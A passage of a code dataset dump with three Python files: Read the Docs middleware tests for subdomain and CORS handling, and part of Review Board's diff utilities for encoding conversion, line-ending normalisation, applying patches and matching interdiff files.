shutil.copy(file_source, file_target)\n except Exception as e:\n traceback.print_exc()\n config.logger.log_message(\n f\"Pre Command could not perform copy: {file_source} -> {file_target}\",\n job_id=job_id\n )\n"} {"ext": "py", "sha": "1a312e1a1308dd2843df3b2ba6b71ce916acac0e", "content": "from __future__ import absolute_import\nfrom django.http import Http404\nfrom django.core.cache import cache\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom django_dynamic_fixture import get, new\n\nfrom corsheaders.middleware import CorsMiddleware\nfrom mock import patch\n\nfrom readthedocs.core.middleware import SubdomainMiddleware\nfrom readthedocs.projects.models import Project, ProjectRelationship, Domain\n\nfrom readthedocs.rtd_tests.utils import create_user\n\n\n@override_settings(USE_SUBDOMAIN=True)\nclass MiddlewareTests(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = SubdomainMiddleware()\n self.url = '/'\n self.owner = create_user(username='owner', password='test')\n self.pip = get(Project, slug='pip', users=[self.owner], privacy_level='public')\n\n def test_failey_cname(self):\n request = self.factory.get(self.url, HTTP_HOST='my.host.com')\n with self.assertRaises(Http404):\n self.middleware.process_request(request)\n self.assertEqual(request.cname, True)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_subdomain(self):\n request = self.factory.get(self.url, HTTP_HOST='pip.readthedocs.org')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='prod.readthedocs.org')\n def test_subdomain_different_length(self):\n request = self.factory.get(self.url, HTTP_HOST='pip.prod.readthedocs.org')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object(self):\n self.domain = get(Domain, domain='docs.foobar.com', project=self.pip)\n\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.domain_object, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object_missing(self):\n self.domain = get(Domain, domain='docs.foobar2.com', project=self.pip)\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n with self.assertRaises(Http404):\n self.middleware.process_request(request)\n\n def test_proper_cname(self):\n cache.get = lambda x: 'my_slug'\n request = self.factory.get(self.url, HTTP_HOST='my.valid.homename')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.slug, 'my_slug')\n\n def test_request_header(self):\n request = self.factory.get(self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='pip')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_cname_uppercase(self):\n cache.get = lambda x: x.split('.')[0]\n request = self.factory.get(self.url, HTTP_HOST='PIP.RANDOM.COM')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_request_header_uppercase(self):\n request = self.factory.get(self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='PIP')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(USE_SUBDOMAIN=True)\n # no need to do a real dns query so patch cname_to_slug\n @patch('readthedocs.core.middleware.cname_to_slug', new=lambda x: 'doesnt')\n def test_use_subdomain_on(self):\n request = self.factory.get(self.url, HTTP_HOST='doesnt.really.matter')\n ret_val = self.middleware.process_request(request)\n self.assertIsNone(ret_val, None)\n\n\nclass TestCORSMiddleware(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = CorsMiddleware()\n self.url = '/api/v2/search'\n self.owner = create_user(username='owner', password='test')\n self.project = get(\n Project, slug='pip',\n users=[self.owner], privacy_level='public',\n mail_language_project=None\n )\n self.subproject = get(\n Project,\n users=[self.owner],\n privacy_level='public',\n mail_language_project=None,\n )\n self.relationship = get(\n ProjectRelationship,\n parent=self.project,\n child=self.subproject\n )\n self.domain = get(Domain, domain='my.valid.domain', project=self.project)\n\n def test_proper_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_invalid_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://invalid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n def test_invalid_project(self):\n request = self.factory.get(\n self.url,\n {'project': 'foo'},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n def test_valid_subproject(self):\n self.assertTrue(\n Project.objects.filter(\n pk=self.project.pk,\n subprojects__child=self.subproject\n ).exists()\n )\n request = self.factory.get(\n self.url,\n {'project': self.subproject.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n"} {"ext": "py", "sha": "1a312ebad291791ff00ecf8ec50a32d5858a499f", "content": "from __future__ import unicode_literals\n\nimport fnmatch\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport tempfile\nfrom difflib import SequenceMatcher\nfrom functools import cmp_to_key\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.utils import six\nfrom django.utils.encoding import force_text\nfrom django.utils.translation import ugettext as _\nfrom djblets.log import log_timed\nfrom djblets.siteconfig.models import SiteConfiguration\nfrom djblets.util.compat.python.past import cmp\nfrom djblets.util.contextmanagers import controlled_subprocess\n\nfrom reviewboard.deprecation import RemovedInReviewBoard50Warning\nfrom reviewboard.diffviewer.commit_utils import exclude_ancestor_filediffs\nfrom reviewboard.diffviewer.errors import DiffTooBigError, PatchError\nfrom reviewboard.scmtools.core import PRE_CREATION, HEAD\n\n\nCHUNK_RANGE_RE = re.compile(\n br'^@@ -(?P<orig_start>\\d+)(,(?P<orig_len>\\d+))? '\n br'\\+(?P<modified_start>\\d+)(,(?P<modified_len>\\d+))? @@',\n re.M)\n\nNEWLINE_CONVERSION_BYTES_RE = re.compile(br'\\r(\\r?\\n)?')\nNEWLINE_CONVERSION_UNICODE_RE = re.compile(r'\\r(\\r?\\n)?')\nNEWLINE_BYTES_RE = re.compile(br'(?:\\n|\\r(?:\\r?\\n)?)')\nNEWLINE_UNICODE_RE = re.compile(r'(?:\\n|\\r(?:\\r?\\n)?)')\n\n_PATCH_GARBAGE_INPUT = 'patch: **** Only garbage was found in the patch input.'\n\n\ndef convert_to_unicode(s, encoding_list):\n \"\"\"Return the passed string as a unicode object.\n\n If conversion to unicode fails, we try the user-specified encoding, which\n defaults to ISO 8859-15. This can be overridden by users inside the\n repository configuration, which gives users repository-level control over\n file encodings.\n\n Ideally, we'd like to have per-file encodings, but this is hard. The best\n we can do now is a comma-separated list of things to try.\n\n Returns the encoding type which was used and the decoded unicode object.\n\n Args:\n s (bytes or bytearray or unicode):\n The string to convert to Unicode.\n\n encoding_list (list of unicode):\n The list of encodings to try.\n\n Returns:\n tuple:\n A tuple with the following information:\n\n 1. A compatible encoding (:py:class:`unicode`).\n 2. The Unicode data (:py:class:`unicode`).\n\n Raises:\n TypeError:\n The provided value was not a Unicode string, byte string, or\n a byte array.\n\n UnicodeDecodeError:\n None of the encoding types were valid for the provided string.\n \"\"\"\n if isinstance(s, bytearray):\n # Some SCMTool backends return file data as a bytearray instead of\n # bytes.\n s = bytes(s)\n\n if isinstance(s, six.text_type):\n # Nothing to do\n return 'utf-8', s\n elif isinstance(s, bytes):\n try:\n # First try strict utf-8\n enc = 'utf-8'\n return enc, six.text_type(s, enc)\n except UnicodeError:\n # Now try any candidate encodings\n for e in encoding_list:\n try:\n return e, six.text_type(s, e)\n except (UnicodeError, LookupError):\n pass\n\n # Finally, try to convert to unicode and replace all unknown\n # characters.\n try:\n enc = 'utf-8'\n return enc, six.text_type(s, enc, errors='replace')\n except UnicodeError:\n raise UnicodeDecodeError(\n _(\"Diff content couldn't be converted to unicode using \"\n \"the following encodings: %s\")\n % (['utf-8'] + encoding_list))\n else:\n raise TypeError('Value to convert is unexpected type %s', type(s))\n\n\ndef convert_line_endings(data):\n r\"\"\"Convert line endings in a file.\n\n Some types of repositories provide files with a single trailing Carriage\n Return (``\\r``), even if the rest of the file used a CRLF (``\\r\\n``)\n throughout. In these cases, GNU diff will add a ``\\ No newline at end of\n file`` to the end of the diff, which GNU patch understands and will apply\n to files with just a trailing ``\\r``.\n\n However, we normalize ``\\r`` to ``\\n``, which breaks GNU patch in these\n cases. This function works around this by removing the last ``\\r`` and\n then converting standard types of newlines to a ``\\n``.\n\n This is not meant for use in providing byte-compatible versions of files,\n but rather to help with comparing lines-for-lines in situations where\n two versions of a file may come from different platforms with different\n newlines.\n\n Args:\n data (bytes or unicode):\n A string to normalize. This supports either byte strings or\n Unicode strings.\n\n Returns:\n bytes or unicode:\n The data with newlines converted, in the original string type.\n\n Raises:\n TypeError:\n The ``data`` argument provided is not a byte string or Unicode\n string.\n \"\"\"\n # See https://www.reviewboard.org/bugs/386/ and\n # https://reviews.reviewboard.org/r/286/ for the rationale behind the\n # normalization.\n if data:\n if isinstance(data, bytes):\n cr = b'\\r'\n lf = b'\\n'\n newline_re = NEWLINE_CONVERSION_BYTES_RE\n elif isinstance(data, six.text_type):\n cr = '\\r'\n lf = '\\n'\n newline_re = NEWLINE_CONVERSION_UNICODE_RE\n else:\n raise TypeError(\n _('%s is not a valid string type for convert_line_endings.')\n % type(data))\n\n if data.endswith(cr):\n data = data[:-1]\n\n data = newline_re.sub(lf, data)\n\n return data\n\n\ndef split_line_endings(data):\n \"\"\"Split a string into lines while preserving all non-CRLF characters.\n\n Unlike :py:meth:`str.splitlines`, this will only split on the following\n character sequences: ``\\n``, ``\\r``, ``\\r\\n``, and ``\\r\\r\\n``.\n\n This is needed to prevent the sort of issues encountered with\n Unicode strings when calling :py:meth:`str.splitlines``, which is that form\n feed characters would be split. :program:`patch` and :program:`diff` accept\n form feed characters as valid characters in diffs, and doesn't treat them\n as newlines, but :py:meth:`str.splitlines` will treat it as a newline\n anyway.\n\n Args:\n data (bytes or unicode):\n The data to split into lines.\n\n Returns:\n list of bytes or unicode:\n The list of lines.\n \"\"\"\n if isinstance(data, bytes):\n lines = NEWLINE_BYTES_RE.split(data)\n elif isinstance(data, six.text_type):\n lines = NEWLINE_UNICODE_RE.split(data)\n else:\n raise TypeError('data must be a bytes or unicode string, not %s'\n % type(data))\n\n # splitlines() would chop off the last entry, if the string ends with\n # a newline. split() doesn't do this. We need to retain that same\n # behavior by chopping it off ourselves.\n if not lines[-1]:\n lines = lines[:-1]\n\n return lines\n\n\ndef patch(diff, orig_file, filename, request=None):\n \"\"\"Apply a diff to a file.\n\n This delegates out to ``patch`` because noone except Larry Wall knows how\n to patch.\n\n Args:\n diff (bytes):\n The contents of the diff to apply.\n\n orig_file (bytes):\n The contents of the original file.\n\n filename (unicode):\n The name of the file being patched.\n\n request (django.http.HttpRequest, optional):\n The HTTP request, for use in logging.\n\n Returns:\n bytes:\n The contents of the patched file.\n\n Raises:\n reviewboard.diffutils.errors.PatchError:\n An error occurred when trying to apply the patch.\n \"\"\"\n log_timer = log_timed('Patching file %s' % filename, request=request)\n\n if not diff.strip():\n # Someone uploaded an unchanged file. Return the one we're patching.\n return orig_file\n\n # Prepare the temporary directory if none is available\n tempdir = tempfile.mkdtemp(prefix='reviewboard.')\n\n try:\n orig_file = convert_line_endings(orig_file)\n diff = convert_line_endings(diff)\n\n (fd, oldfile) = tempfile.mkstemp(dir=tempdir)\n f = os.fdopen(fd, 'w+b')\n f.write(orig_file)\n f.close()\n\n newfile = '%s-new' % oldfile\n\n process = subprocess.Popen(['patch', '-o', newfile, oldfile],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, cwd=tempdir)\n\n with controlled_subprocess('patch', process) as p:\n stdout, stderr = p.communicate(diff)\n failure = p.returncode\n\n try:\n with open(newfile, 'rb') as f:\n new_file = f.read()\n except Exception:\n new_file = None\n\n if failure:\n rejects_file = '%s.rej' % newfile\n\n try:\n with open(rejects_file, 'rb') as f:\n rejects = f.read()\n except Exception:\n rejects = None\n\n error_output = force_text(stderr.strip() or stdout.strip())\n\n # Munge the output to show the filename instead of\n # randomly-generated tempdir locations.\n base_filename = os.path.basename(filename)\n\n error_output = (\n error_output\n .replace(rejects_file, '%s.rej' % base_filename)\n .replace(oldfile, base_filename)\n )\n\n raise PatchError(filename=filename,\n error_output=error_output,\n orig_file=orig_file,\n new_file=new_file,\n diff=diff,\n rejects=rejects)\n\n return new_file\n finally:\n shutil.rmtree(tempdir)\n log_timer.done()\n\n\ndef get_original_file_from_repo(filediff, request=None, encoding_list=None):\n \"\"\"Return the pre-patched file for the FileDiff from the repository.\n\n The parent diff will be applied if it exists.\n\n Version Added:\n 4.0\n\n Args:\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff to retrieve the pre-patch file for.\n\n request (django.http.HttpRequest, optional):\n The HTTP request from the client.\n\n encoding_list (list of unicode, optional):\n A custom list of encodings to try when processing the file. This\n will override the encoding list normally retrieved from the\n FileDiff and repository.\n\n If there's already a known valid encoding for the file, it will be\n used instead.\n\n This is here for compatibility and will be removed in Review Board\n 5.0.\n\n Returns:\n bytes:\n The pre-patched file.\n\n Raises:\n UnicodeDecodeError:\n The source file was not compatible with any of the available\n encodings.\n\n reviewboard.diffutils.errors.PatchError:\n An error occurred when trying to apply the patch.\n\n reviewboard.scmtools.errors.SCMError:\n An error occurred while computing the pre-patch file.\n \"\"\"\n data = b''\n extra_data = filediff.extra_data or {}\n\n # If the file has a parent source filename/revision recorded, we're\n # going to need to fetch that, since that'll be (potentially) the\n # latest commit in the repository.\n #\n # This information was added in Review Board 3.0.19. Prior versions\n # stored the parent source revision as filediff.source_revision\n # (rather than leaving that as identifying information for the actual\n # file being shown in the review). It did not store the parent\n # filename at all (which impacted diffs that contained a moved/renamed\n # file on any type of repository that required a filename for lookup,\n # such as Mercurial -- Git was not affected, since it only needs\n # blob SHAs).\n #\n # If we're not working with a parent diff, or this is a FileDiff\n # with legacy parent diff information, we just use the FileDiff\n # FileDiff filename/revision fields as normal.\n source_filename = extra_data.get('parent_source_filename',\n filediff.source_file)\n source_revision = extra_data.get('parent_source_revision',\n filediff.source_revision)\n\n if source_revision != PRE_CREATION:\n repository = filediff.get_repository()\n\n data = repository.get_file(\n source_filename,\n source_revision,\n base_commit_id=filediff.diffset.base_commit_id,\n request=request)\n # Convert to unicode before we do anything to manipulate the string.\n encoding_list = get_filediff_encodings(filediff, encoding_list)\n encoding, data = convert_to_unicode(data, encoding_list)\n\n # Repository.get_file doesn't know or care about how we need line\n # endings to work. So, we'll just transform every time.\n #\n # This is mostly only a problem if the diff chunks aren't in the\n # cache, though if several people are working off the same file,\n # we'll be doing extra work to convert those line endings for each\n # of those instead of once.\n #\n # Only other option is to cache the resulting file, but then we're\n # duplicating the cached contents.\n data = convert_line_endings(data)\n\n # Convert back to bytes using whichever encoding we used to decode.\n data = data.encode(encoding)\n\n if not filediff.encoding:\n # Now that we know an encoding that works, remember it for next\n # time.\n filediff.extra_data['encoding'] = encoding\n filediff.save(update_fields=('extra_data',))\n\n # If there's a parent diff set, apply it to the buffer.\n if (filediff.parent_diff and\n not filediff.is_parent_diff_empty(cache_only=True)):\n try:\n data = patch(diff=filediff.parent_diff,\n orig_file=data,\n filename=source_filename,\n request=request)\n except PatchError as e:\n # patch(1) cannot process diff files that contain no diff sections.\n # We are going to check and see if the parent diff contains no diff\n # chunks.\n if (e.error_output == _PATCH_GARBAGE_INPUT and\n not filediff.is_parent_diff_empty()):\n raise\n\n return data\n\n\ndef get_original_file(filediff, request=None, encoding_list=None):\n \"\"\"Return the pre-patch file of a FileDiff.\n\n Version Changed:\n 4.0:\n The ``encoding_list`` parameter should no longer be provided by\n callers. Encoding lists are now calculated automatically. Passing\n a custom list will override the calculated one.\n\n Args:\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff to retrieve the pre-patch file for.\n\n request (django.http.HttpRequest, optional):\n The HTTP request from the client.\n\n encoding_list (list of unicode, optional):\n A custom list of encodings to try when processing the file. This\n will override the encoding list normally retrieved from the\n FileDiff and repository.\n\n If there's already a known valid encoding for the file, it will be\n used instead.\n\n Returns:\n bytes:\n The pre-patch file.\n\n Raises:\n UnicodeDecodeError:\n The source file was not compatible with any of the available\n encodings.\n\n reviewboard.diffutils.errors.PatchError:\n An error occurred when trying to apply the patch.\n\n reviewboard.scmtools.errors.SCMError:\n An error occurred while computing the pre-patch file.\n \"\"\"\n if encoding_list:\n RemovedInReviewBoard50Warning.warn(\n 'The encoding_list parameter passed to get_original_file() is '\n 'deprecated and will be removed in Review Board 5.0.')\n\n data = b''\n\n # If the FileDiff has a parent diff, it must be the case that it has no\n # ancestor FileDiffs. We can fall back to the no history case here.\n if filediff.parent_diff:\n return get_original_file_from_repo(filediff=filediff,\n request=request,\n encoding_list=encoding_list)\n\n # Otherwise, there may be one or more ancestors that we have to apply.\n ancestors = filediff.get_ancestors(minimal=True)\n\n if ancestors:\n oldest_ancestor = ancestors[0]\n\n # If the file was created outside this history, fetch it from the\n # repository and apply the parent diff if it exists.\n if not oldest_ancestor.is_new:\n data = get_original_file_from_repo(filediff=oldest_ancestor,\n request=request,\n encoding_list=encoding_list)\n\n if not oldest_ancestor.is_diff_empty:\n data = patch(diff=oldest_ancestor.diff,\n orig_file=data,\n filename=oldest_ancestor.source_file,\n request=request)\n\n for ancestor in ancestors[1:]:\n # TODO: Cache these results so that if this ``filediff`` is an\n # ancestor of another FileDiff, computing that FileDiff's original\n # file will be cheaper. This will also allow an ancestor filediff's\n # original file to be computed cheaper.\n data = patch(diff=ancestor.diff,\n orig_file=data,\n filename=ancestor.source_file,\n request=request)\n elif not filediff.is_new:\n data = get_original_file_from_repo(filediff=filediff,\n request=request,\n encoding_list=encoding_list)\n\n return data\n\n\ndef get_patched_file(source_data, filediff, request=None):\n \"\"\"Return the patched version of a file.\n\n This will normalize the patch, applying any changes needed for the\n repository, and then patch the provided data with the patch contents.\n\n Args:\n source_data (bytes):\n The file contents to patch.\n\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff representing the patch.\n\n request (django.http.HttpClient, optional):\n The HTTP request from the client.\n\n Returns:\n bytes:\n The patched file contents.\n \"\"\"\n repository = filediff.get_repository()\n diff = repository.normalize_patch(patch=filediff.diff,\n filename=filediff.source_file,\n revision=filediff.source_revision)\n\n return patch(diff=diff,\n orig_file=source_data,\n filename=filediff.dest_file,\n request=request)\n\n\ndef get_revision_str(revision):\n if revision == HEAD:\n return \"HEAD\"\n elif revision == PRE_CREATION:\n return \"\"\n else:\n return _(\"Revision %s\") % revision\n\n\ndef get_filenames_match_patterns(patterns, filenames):\n \"\"\"Return whether any of the filenames match any of the patterns.\n\n This is used to compare a list of filenames to a list of\n :py:mod:`patterns <fnmatch>`. The patterns are case-sensitive.\n\n Args:\n patterns (list of unicode):\n The list of patterns to match against.\n\n filename (list of unicode):\n The list of filenames.\n\n Returns:\n bool:\n ``True`` if any filenames match any patterns. ``False`` if none match.\n \"\"\"\n for pattern in patterns:\n for filename in filenames:\n if fnmatch.fnmatchcase(filename, pattern):\n return True\n\n return False\n\n\ndef get_filediff_encodings(filediff, encoding_list=None):\n \"\"\"Return a list of encodings to try for a FileDiff's source text.\n\n If the FileDiff already has a known encoding stored, then it will take\n priority. The provided encoding list, or the repository's list of\n configured encodingfs, will be provided as fallbacks.\n\n Args:\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff to return encodings for.\n\n encoding_list (list of unicode, optional):\n An explicit list of encodings to try. If not provided, the\n repository's list of encodings will be used instead (which is\n generally preferred).\n\n Returns:\n list of unicode:\n The list of encodings to try for the source file.\n \"\"\"\n filediff_encoding = filediff.encoding\n encodings = []\n\n if encoding_list is None:\n encoding_list = filediff.get_repository().get_encoding_list()\n\n if filediff_encoding:\n encodings.append(filediff_encoding)\n encodings += [\n encoding\n for encoding in encoding_list\n if encoding != filediff_encoding\n ]\n else:\n encodings += encoding_list\n\n return encodings\n\n\ndef get_matched_interdiff_files(tool, filediffs, interfilediffs):\n \"\"\"Generate pairs of matched files for display in interdiffs.\n\n This compares a list of filediffs and a list of interfilediffs, attempting\n to best match up the files in both for display in the diff viewer.\n\n This will prioritize matches that share a common source filename,\n destination filename, and new/deleted state. Failing that, matches that\n share a common source filename are paired off.\n\n Any entries in ``interfilediffs` that don't have any match in ``filediffs``\n are considered new changes in the interdiff, and any entries in\n ``filediffs`` that don't have entries in ``interfilediffs`` are considered\n reverted changes.\n\n Args:\n tool (reviewboard.scmtools.core.SCMTool)\n The tool used for all these diffs.\n\n filediffs (list of reviewboard.diffviewer.models.filediff.FileDiff):\n The list of filediffs on the left-hand side of the diff range.\n\n interfilediffs (list of reviewboard.diffviewer.models.filediff.\n FileDiff):\n The list of filediffs on the right-hand side of the diff range.\n\n Yields:\n tuple:\n A paired off filediff match. This is a tuple containing two entries,\n each a :py:class:`~reviewboard.diffviewer.models.filediff.FileDiff` or\n ``None``.\n \"\"\"\n parser = tool.get_parser(b'')\n _normfile = parser.normalize_diff_filename\n\n def _make_detail_key(filediff):\n return (_normfile(filediff.source_file),\n _normfile(filediff.dest_file),\n filediff.is_new,\n filediff.deleted)\n\n # In order to support interdiffs properly, we need to display diffs on\n # every file in the union of both diffsets. Iterating over one diffset\n # or the other doesn't suffice. We also need to be careful to handle\n # things like renamed/moved files, particularly when there are multiple\n # of them with the same source filename.\n #\n # This is done in four stages:\n #\n # 1. Build up maps and a set for keeping track of possible\n # interfilediff candidates for future stages.\n #\n # 2. Look for any files that are common between the two diff revisions\n # that have the same source filename, same destination filename, and\n # the same new/deleted states.\n #\n # Unless a diff is hand-crafted, there should never be more than one\n # match here.\n #\n # 3. Look for any files that are common between the two diff revisions\n # that have the same source filename and new/deleted state. These will\n # ignore the destination filename, helping to match cases where diff 1\n # modifies a file and diff 2 modifies + renames/moves it.\n #\n # 4. Add any remaining files from diff 2 that weren't found in diff 1.\n #\n # We don't have to worry about things like the order of matched diffs.\n # That will be taken care of at the end of the function.\n detail_interdiff_map = {}\n simple_interdiff_map = {}\n remaining_interfilediffs = set()\n\n # Stage 1: Build up the maps/set of interfilediffs.\n for interfilediff in interfilediffs:\n source_file = _normfile(interfilediff.source_file)\n detail_key = _make_detail_key(interfilediff)\n\n # We'll store this interfilediff in three spots: The set of\n # all interfilediffs, the detail map (for source + dest +\n # is_new file comparisons), and the simple map (for direct\n # source_file comparisons). These will be used for the\n # different matching stages.\n remaining_interfilediffs.add(interfilediff)\n detail_interdiff_map[detail_key] = interfilediff\n simple_interdiff_map.setdefault(source_file, set()).add(interfilediff)\n\n # Stage 2: Look for common files with the same source/destination\n # filenames and new/deleted states.\n #\n # There will only be one match per filediff, at most. Any filediff or\n # interfilediff that we find will be excluded from future stages.\n remaining_filediffs = []\n\n for filediff in filediffs:\n source_file = _normfile(filediff.source_file)\n\n try:\n interfilediff = detail_interdiff_map.pop(\n _make_detail_key(filediff))\n except KeyError:\n remaining_filediffs.append(filediff)\n continue\n\n yield filediff, interfilediff\n\n if interfilediff:\n remaining_interfilediffs.discard(interfilediff)\n\n try:\n simple_interdiff_map.get(source_file, []).remove(interfilediff)\n except ValueError:\n pass\n\n # Stage 3: Look for common files with the same source/destination\n # filenames (when they differ).\n #\n # Any filediff from diff 1 not already processed in stage 2 will be\n # processed here. We'll look for any filediffs from diff 2 that were\n # moved/copied from the same source to the same destination. This is one\n # half of the detailed file state we checked in stage 2.\n new_remaining_filediffs = []\n\n for filediff in remaining_filediffs:\n source_file = _normfile(filediff.source_file)\n found_interfilediffs = [\n temp_interfilediff\n for temp_interfilediff in simple_interdiff_map.get(source_file, [])\n if (temp_interfilediff.dest_file == filediff.dest_file and\n filediff.source_file != filediff.dest_file)\n ]\n\n if found_interfilediffs:\n remaining_interfilediffs.difference_update(found_interfilediffs)\n\n for interfilediff in found_interfilediffs:\n simple_interdiff_map[source_file].remove(interfilediff)\n yield filediff, interfilediff\n else:\n new_remaining_filediffs.append(filediff)\n\n remaining_filediffs = new_remaining_filediffs\n\n # Stage 4: Look for common files with the same source filenames and\n # new/deleted states.\n #\n # Any filediff from diff 1 not already processed in stage 3 will be\n # processed here. We'll look for any filediffs from diff 2 that match\n # the source filename and the new/deleted state. Any that we find will\n # be matched up.\n new_remaining_filediffs = []\n\n for filediff in remaining_filediffs:\n source_file = _normfile(filediff.source_file)\n found_interfilediffs = [\n temp_interfilediff\n for temp_interfilediff in simple_interdiff_map.get(source_file, [])\n if (temp_interfilediff.is_new == filediff.is_new and\n temp_interfilediff.deleted == filediff.deleted)\n ]\n\n if found_interfilediffs:\n remaining_interfilediffs.difference_update(found_interfilediffs)\n\n for interfilediff in found_interfilediffs:\n simple_interdiff_map[source_file].remove(interfilediff)\n yield filediff, interfilediff\n else:\n new_remaining_filediffs.append(filediff)\n\n remaining_filediffs = new_remaining_filediffs\n\n # Stage 5: Look for common files with the same source filenames and\n # compatible new/deleted states.\n #\n # This will help catch files that were marked as new in diff 1 but not in\n # diff 2, or deleted in diff 2 but not in diff 1. (The inverse for either\n # is NOT matched!). This is important because if a file is introduced in a\n # parent diff, the file can end up showing up as new itself (which is a\n # separate bug).\n #\n # Even if that bug did not exist, it's still possible for a file to be new\n # in one revision but committed separately (by that user or another), so we\n # need these matched.\n #\n # Any files not found with a matching interdiff will simply be yielded.\n # This is the last stage dealing with the filediffs in the first revision.\n for filediff in remaining_filediffs:\n source_file = _normfile(filediff.source_file)\n found_interfilediffs = [\n temp_interfilediff\n for temp_interfilediff in simple_interdiff_map.get(source_file, [])\n if (((filediff.is_new or not temp_interfilediff.is_new) or\n (not filediff.is_new and temp_interfilediff.is_new and\n filediff.dest_detail == temp_interfilediff.dest_detail)) and\n (not filediff.deleted or temp_interfilediff.deleted))\n ]\n\n if found_interfilediffs:\n remaining_interfilediffs.difference_update(found_interfilediffs)\n\n for interfilediff in found_interfilediffs:\n # NOTE: If more stages are ever added that deal with\n # simple_interdiff_map, then we'll need to remove\n # interfilediff from that map here.\n yield filediff, interfilediff\n else:\n yield filediff, None\n\n # Stage 6: Add any remaining files from the interdiff.\n #\n # We've removed everything that we've already found. What's left are\n # interdiff files that are new. They have no file to diff against.\n #\n # The end result is going to be a view that's the same as when you're\n # viewing a standard diff. As such, we can pretend the interdiff is\n # the source filediff and not specify an interdiff. Keeps things\n # simple, code-wise, since we really have no need to special-case\n # this.\n for interfilediff in remaining_interfilediffs:\n yield None, interfilediff\n\n\ndef get_filediffs_match(filediff1, filediff2):\n \"\"\"Return whether two FileDiffs effectively match.\n\n This is primarily checking that the patched version of two files are going\n to be basically the same.\n\n This will first check that we even have both FileDiffs. Assuming we have\n both, this will check the diff for equality. If not equal, we at least\n check that both files were deleted (which is equivalent to being equal).\n\n The patched SHAs are then checked. These would be generated as part of the\n diff viewing process, so may not be available. We prioritize the SHA256\n hashes (introduced in Review Board 4.0), and fall back on SHA1 hashes if\n not present.\n\n Args:\n filediff1 (reviewboard.diffviewer.models.filediff.FileDiff):\n The first FileDiff to compare.\n\n filediff2 (reviewboard.diffviewer.models.filediff.FileDiff):\n The second FileDiff to compare.\n\n Returns:\n bool:\n ``True`` if both FileDiffs effectively match. ``False`` if they do\n not.\n\n Raises:\n ValueError:\n ``None`` was provided for both ``filediff1`` and ``filediff2``.\n \"\"\"\n if filediff1 is None and filediff2 is None:\n raise ValueError('filediff1 and filediff2 cannot both be None')\n\n # For the hash comparisons, there's a chance we won't have any SHA1 (RB\n # 2.0+) or SHA256 (RB 4.0+) hashes, so we have to check for them. We want\n # to prioritize SHA256 hashes, but if the filediff or interfilediff lacks\n # a SHA256 hash, we want to fall back to SHA1.\n return (filediff1 is not None and filediff2 is not None and\n (filediff1.diff == filediff2.diff or\n (filediff1.deleted and filediff2.deleted) or\n (filediff1.patched_sha256 is not None and\n filediff1.patched_sha256 == filediff2.patched_sha256) or\n ((filediff1.patched_sha256 is None or\n filediff2.patched_sha256 is None) and\n filediff1.patched_sha1 is not None and\n filediff1.patched_sha1 == filediff2.patched_sha1)))\n\n\ndef get_diff_files(diffset, filediff=None, interdiffset=None,\n interfilediff=None, base_filediff=None, request=None,\n filename_patterns=None, base_commit=None, tip_commit=None):\n \"\"\"Return a list of files that will be displayed in a diff.\n\n This will go through the given diffset/interdiffset, or a given filediff\n within that diffset, and generate the list of files that will be\n displayed. This file list will contain a bunch of metadata on the files,\n such as the index, original/modified names, revisions, associated\n filediffs/diffsets, and so on.\n\n This can be used along with :py:func:`populate_diff_chunks` to build a full\n list containing all diff chunks used for rendering a side-by-side diff.\n\n Args:\n diffset (reviewboard.diffviewer.models.diffset.DiffSet):\n The diffset containing the files to return.\n\n filediff 